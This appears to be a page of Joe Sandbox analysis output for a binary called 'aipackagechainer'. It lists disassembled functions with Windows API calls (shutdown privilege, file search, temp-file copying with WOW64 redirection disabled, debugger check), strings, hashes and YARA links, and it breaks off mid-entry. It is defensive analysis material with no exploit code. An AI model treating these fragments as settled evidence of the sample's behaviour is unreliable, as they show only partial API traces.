Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Wow64$DriveRedirection_wcsrchr$DisableHeapLogicalProcessRevertStringsType
String ID: !$N+$]%!
API String ID: 1737443197-3236540078
Opcode ID: 743b83c304495214106eeb590292ae700f747ec2648a13bc96c9cd1def115f2d
Instruction ID: 3ddf4e0afc264ff1deb15b4fab3667c74a512401e913cfeae3a400610ccf1ea2
Opcode Fuzzy Hash: 743b83c304495214106eeb590292ae700f747ec2648a13bc96c9cd1def115f2d
Instruction Fuzzy Hash: EEF1E37191015ADBDB24DF68C848BEDF7F4AF04351F1486E8E81AA7291DB709E98CF90

Function 0021BD60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156windowshutdownCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(4938EAB5,?,?,?), ref: 0021BDC2
MessageBoxW.USER32(00000000,?,?,00000044), ref: 0021BDCD
GetCurrentProcess.KERNEL32 ref: 0021BE81
OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 0021BE8E
CloseHandle.KERNEL32(00000000), ref: 0021BEAE
GetLastError.KERNEL32 ref: 0021BEF3
ExitWindowsEx.USER32(00000006,80040002), ref: 0021BF04
CloseHandle.KERNEL32(00000000), ref: 0021BF24

Strings

SeShutdownPrivilege, xrefs: 0021BEC3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CloseHandleProcess$CurrentErrorExitForegroundLastMessageOpenTokenWindowWindows
String ID: SeShutdownPrivilege
API String ID: 1440564136-3733053543
Opcode ID: 2f1f29021b5b8279064fe165f6a14ded1c8258a0cdf69474dbcf5afd5a5746e5
Instruction ID: e1c730f7e0f91d6a23cc5a436ab0c4bcb9df942e109a700c5932bc3201828633
Opcode Fuzzy Hash: 2f1f29021b5b8279064fe165f6a14ded1c8258a0cdf69474dbcf5afd5a5746e5
Instruction Fuzzy Hash: 1E516E709012099BDB10DFA8C988BDEFBF4EF19720F248259E815AB2D1DB759D45CFA0

Function 0023B760 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 556COMMON

Download Yara Rule

APIs

Part of subcall function 0027C537: EnterCriticalSection.KERNEL32(002D7FD4,?,00000000,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C542
Part of subcall function 0027C537: LeaveCriticalSection.KERNEL32(002D7FD4,?,002135E6,002D88D0,4938EAB5,00000000,?,0029BA2D,000000FF,?,0024D125,4938EAB5,?,00000000), ref: 0027C57F

GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0023BB3A
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0023BB41
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0023BB55
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0023BB5C

Strings

Error, xrefs: 0023BE1C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ConsoleCriticalHandleSection$AttributeBufferEnterInfoLeaveScreenText
String ID: Error
API String ID: 2673574109-2619118453
Opcode ID: 66157b572b0482d35b91b901c67427a6ae879f20a4bb54cc1853e080fb84b259
Instruction ID: 9183a7f8865474cbf4f0d0f227cae9f9bbaf2e9028dd1b09a10307e0b664172b
Opcode Fuzzy Hash: 66157b572b0482d35b91b901c67427a6ae879f20a4bb54cc1853e080fb84b259
Instruction Fuzzy Hash: 1C42DDB0D1021ACFDB24CF68CC48BEDBBB1BF54314F208299E518A7691EB745A95CF90

Function 0023B650 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 459COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0023BB3A
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0023BB41
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0023BB55
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0023BB5C
GetStdHandle.KERNEL32(000000F5,?,?,00000000,?,00000000,002BC468,00000002,?,?), ref: 0023BBEB
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0023BBF2

Strings

*** Stack Trace (x86) ***, xrefs: 0023B6A5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ConsoleHandle$AttributeText$BufferInfoScreen
String ID: *** Stack Trace (x86) ***
API String ID: 575076100-1035257212
Opcode ID: 2c038b1b383ff7140d2153f1da1caceb2fdbdfa3c14b47c9b19a0caa9f26869c
Instruction ID: 8657b5f6e3a18aa6146e0827260b5861a7245c219de9ec08ce4ed64d332d89db
Opcode Fuzzy Hash: 2c038b1b383ff7140d2153f1da1caceb2fdbdfa3c14b47c9b19a0caa9f26869c
Instruction Fuzzy Hash: 2612CEB0D10209DBDB24CFA8DC49BEDBBB5FF59314F20826AE415A7690DB746A90CF50

Function 00255E50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,4938EAB5,?,00000000,00000000), ref: 00255F52
FindNextFileW.KERNEL32(?,00000000,?,00000000,00000000), ref: 00255F6D

Strings

!, xrefs: 00255F58, 00256461

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FileFind$FirstNext
String ID: !
API String ID: 1690352074-518105870
Opcode ID: cb762cfaa04eab02f8737b604912ce448e77c5a174244a0da1d4a425bd4d463a
Instruction ID: 90cd0731702197aa2afd7c7a0d97b6805a72496693d6d3fe115e66ab2bdfaf8c
Opcode Fuzzy Hash: cb762cfaa04eab02f8737b604912ce448e77c5a174244a0da1d4a425bd4d463a
Instruction Fuzzy Hash: B781AD71910249DFDF20DFA8C848AEEBBF8FF09315F548169E805AB291DB749E18CB50

Function 0023CA10 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,4938EAB5,00000000,00000000,?), ref: 0023CA65
GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 0023CB2C
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 0023CBD4
CopyFileW.KERNEL32(?,?,00000000), ref: 0023CBF6
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0023CC7A

Strings

shim_clone, xrefs: 0023CB26

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Wow64$FileRedirection$CopyDisableFolderNamePathRevertTemp
String ID: shim_clone
API String ID: 1788126375-3944563459
Opcode ID: e30cdcff818ab18c454f0a49782c417c5ffc92f5beed855694c98662c621f116
Instruction ID: ac136a7f72012e21dce5136d4c66f8b6bdde165abb0a35501540e33a7cb75b3e
Opcode Fuzzy Hash: e30cdcff818ab18c454f0a49782c417c5ffc92f5beed855694c98662c621f116
Instruction Fuzzy Hash: 7891F4B4A1025A8BDF28DF34CC457A9B7F5EF14300F2484AEE44AE7291EB349E95CB54

Function 00298099 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0029827D

Strings

1#INF, xrefs: 002981CF
1#SNAN, xrefs: 002981A5
1#QNAN, xrefs: 002981AC
1#IND, xrefs: 0029819E

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 698150da14f4fba15ae7123e1ef5c32fcb8f093695042f9fdac8e2b125b84a56
Instruction ID: 46ad664833e778c8bdfc95124ee57d1e33e61d22631f9c378f35b8be88de80d4
Opcode Fuzzy Hash: 698150da14f4fba15ae7123e1ef5c32fcb8f093695042f9fdac8e2b125b84a56
Instruction Fuzzy Hash: 46D23971E282298FDF25CE28CD407EAB7B5EB45314F1841EAD80DE7240EB74AE958F41

Function 0027A0EE Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,0027A00A,00000000,?,0027A1A2), ref: 0027A0F0
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,0027A1A2), ref: 0027A117
HeapAlloc.KERNEL32(00000000,?,0027A1A2), ref: 0027A11E
InitializeSListHead.KERNEL32(00000000,?,0027A1A2), ref: 0027A12B
GetProcessHeap.KERNEL32(00000000,00000000,?,0027A1A2), ref: 0027A140
HeapFree.KERNEL32(00000000,?,0027A1A2), ref: 0027A147

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 02f32ba9e31dbee928954ca82eb2bbca8f165b34041c77430fb149f0cc305363
Instruction ID: 7c92be259d38db423b8924f61f1071fc5d5390ef7745433c66b11874486683e8
Opcode Fuzzy Hash: 02f32ba9e31dbee928954ca82eb2bbca8f165b34041c77430fb149f0cc305363
Instruction Fuzzy Hash: 1AF04435611612DBEF105F7DBC0DB1677A8BB85B11F164429F999D3250EE748802CB51

Function 002545C0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

!, xrefs: 002547E8, 0025493C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-518105870
Opcode ID: 2f00df7c96bdb5a83d3d9e6c984d0d961e7f79cfa2ecd886bb609d0b49e5c6d6
Instruction ID: ae51fbb733d3ba61b5a840305b56bca78ba9d85029a29d1ce41a0f20edbcb95a
Opcode Fuzzy Hash: 2f00df7c96bdb5a83d3d9e6c984d0d961e7f79cfa2ecd886bb609d0b49e5c6d6
Instruction Fuzzy Hash: C5819C70911219DFDB50DF28CC8DB99F7B4AF49314F1482D9E818AB292DB709E94CF91

Function 00296D4A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00297068,00000002,00000000,?,?,?,00297068,?,00000000), ref: 00296DE3
GetLocaleInfoW.KERNEL32(?,20001004,00297068,00000002,00000000,?,?,?,00297068,?,00000000), ref: 00296E0C
GetACP.KERNEL32(?,?,00297068,?,00000000), ref: 00296E21

Strings

OCP, xrefs: 00296D9E
ACP, xrefs: 00296D68

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: e4c7c8f187d4f0fab644e0accd395d81f77f9aec01a3e1819c84db922204b5da
Instruction ID: 2b4c491c41e4575315f09adb079c21510ddb32e2e72593c3abbeb00c5ad9b28d
Opcode Fuzzy Hash: e4c7c8f187d4f0fab644e0accd395d81f77f9aec01a3e1819c84db922204b5da
Instruction Fuzzy Hash: 57219D76730102ABEF358F54C908BA777E7EB54B50B568434E95ADB108EB32DE61C360

Function 00296F1F Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0029702B
IsValidCodePage.KERNEL32(00000000), ref: 00297074
IsValidLocale.KERNEL32(?,00000001), ref: 00297083
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002970CB
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002970EA

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: cf4cd3a15b52e2dea1f23ed7c540fd8b71e2c1d615ed35a5b779f9e70f92ec47
Instruction ID: c474dff367e405ef3a675b3f5add96f95e79cff85424808847a321ac48d3517b
Opcode Fuzzy Hash: cf4cd3a15b52e2dea1f23ed7c540fd8b71e2c1d615ed35a5b779f9e70f92ec47
Instruction Fuzzy Hash: 3E519E72A24206ABEF10EFA5DC45ABE73F8FF09740F144429E915E7190EB709A64CB61

Function 002965BB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028CFD6: GetLastError.KERNEL32(?,002D63F0,00288EBE,?,?,0028906D,?,?,00000000,?,?,?,00000003,00281362,?,002812D1), ref: 0028CFDA
Part of subcall function 0028CFD6: SetLastError.KERNEL32(00000000,?,002814E0,?,?,?,?,?,00000000,?,?,?,0028AE99,002D3820,0000000C,0028B157), ref: 0028D07C

GetACP.KERNEL32(?,?,?,?,?,?,0028BBB3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0029667C
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0028BBB3,?,?,?,00000055,?,-00000050,?,?), ref: 002966A7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0029680A

Strings

utf8, xrefs: 00296779

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 41f4a9e701d99110010110c77151ee954d868598f72795645b17da3e3aaebd86
Instruction ID: ed68b5e5d25d0c6548f36b5e223158b1ecc04dac5d030cbf910d30fd11794f9b
Opcode Fuzzy Hash: 41f4a9e701d99110010110c77151ee954d868598f72795645b17da3e3aaebd86
Instruction Fuzzy Hash: 78710531A20212AAEF24AF75CC8ABB6B7ECEF44314F144429F506D71C1EB74ED648B60

Function 00211880 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 202fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,4938EAB5,00000000), ref: 00211973
FindClose.KERNEL32(000000FF,?), ref: 00211B32

Strings

!, xrefs: 002118CB, 00211B23

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: !
API String ID: 2295610775-518105870
Opcode ID: f78af1804bbc0caf09c2e8410fd3fe6cd531ef5850061107d85fa0cf9f2d172c
Instruction ID: 6b26b5b2792da84f561e9723f3f16075a2313ce8da2bcba29f81978171da7855
Opcode Fuzzy Hash: f78af1804bbc0caf09c2e8410fd3fe6cd531ef5850061107d85fa0cf9f2d172c
Instruction Fuzzy Hash: 09818D70D1120ADFDB24DF64C959BEEBBF4AF24300F108299E41967291D7706AA5CF90

Function 00254A00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 199fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00254AF3
FindClose.KERNEL32(00000000), ref: 00254C3E

Strings

!, xrefs: 00254AFB, 00254C2F
%d.%d.%d.%d, xrefs: 00254BD0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: !$%d.%d.%d.%d
API String ID: 2295610775-1544181526
Opcode ID: 04a9ae04ae951e4aa5621dcc1ce26f2d16737f5d71bf079d84e2f4e95d1c0189
Instruction ID: 50f55dbcb3aa331e5ccdfdd09fc39b5a652c6c03c760836469e112b6a4aa7911
Opcode Fuzzy Hash: 04a9ae04ae951e4aa5621dcc1ce26f2d16737f5d71bf079d84e2f4e95d1c0189
Instruction Fuzzy Hash: 6F717F70905219DFDB20EF28C84CB9DBBB5EF45319F108299E819AB291DB319E94CF80

Function 00255AF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00255BCA

Strings

\, xrefs: 00255B44
\, xrefs: 00255B6E
\, xrefs: 00255B4C

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: DiskFreeSpace
String ID: \$\$\
API String ID: 1705453755-3791832595
Opcode ID: 426c7dc8c8985df8d09296dff11dfe1bb86fbb1c667188d9729407005e5bcfd4
Instruction ID: e97657cc97121506bc54fc2cdf5f56a5258ccaf312b3e6c66f6e7dfa28100596
Opcode Fuzzy Hash: 426c7dc8c8985df8d09296dff11dfe1bb86fbb1c667188d9729407005e5bcfd4
Instruction Fuzzy Hash: CC410662E2472687CB309F24845967BB3F4FF9435AF154A2EECC897140E7708D9883CA

Function 0028E34D Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0028E3DA

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 1b3e4c147fdd10b8ecbbd374f7cbb7dd890ddfdf7fa48647826ec1bbabe49864
Instruction ID: 4aebdf979ab592b25032526c2d6edf2e0f9274ace0bad4e28fa077e309cc03e5
Opcode Fuzzy Hash: 1b3e4c147fdd10b8ecbbd374f7cbb7dd890ddfdf7fa48647826ec1bbabe49864
Instruction Fuzzy Hash: 93B16A75D222569FDF11AF28C881BEEBBE5EF15304F168169E805AB281E274DD21CB60

Function 002940CD Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00294168
FindNextFileW.KERNEL32(00000000,?), ref: 002941E3
FindClose.KERNEL32(00000000), ref: 00294205
FindClose.KERNEL32(00000000), ref: 00294228

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 5e6b7c57fc880d918b6cc3b7eae20481c8ebc2bee6e41e4e8fe1f7d0fc55f59e
Instruction ID: 6e930b6372f2286350adc26d4c08534d30ac3f1787b8b2052f9b3141b87774d4
Opcode Fuzzy Hash: 5e6b7c57fc880d918b6cc3b7eae20481c8ebc2bee6e41e4e8fe1f7d0fc55f59e
Instruction Fuzzy Hash: 8E41D57191022AABDF20FF64DC8DEBAB3B9EB95358F144195E80997140E7709ED1CF60

Function 0027D03D Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0027D049
IsDebuggerPresent.KERNEL32 ref: 0027D115
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0027D135
UnhandledExceptionFilter.KERNEL32(?), ref: 0027D13F

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 921907a1e8f82caf0200e627fbd833526767dba76c896470a212cb54eef7eb0a
Instruction ID: ed28fcc41665464b259faa195681633f1be34543864b017165eed8bcbf9c9f8d
Opcode Fuzzy Hash: 921907a1e8f82caf0200e627fbd833526767dba76c896470a212cb54eef7eb0a
Instruction Fuzzy Hash: E83129B5D5521D9BDF20DFA4D9897CCBBB8AF08300F1041AAE40DAB250EB719A85CF45

Function 0024CDF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

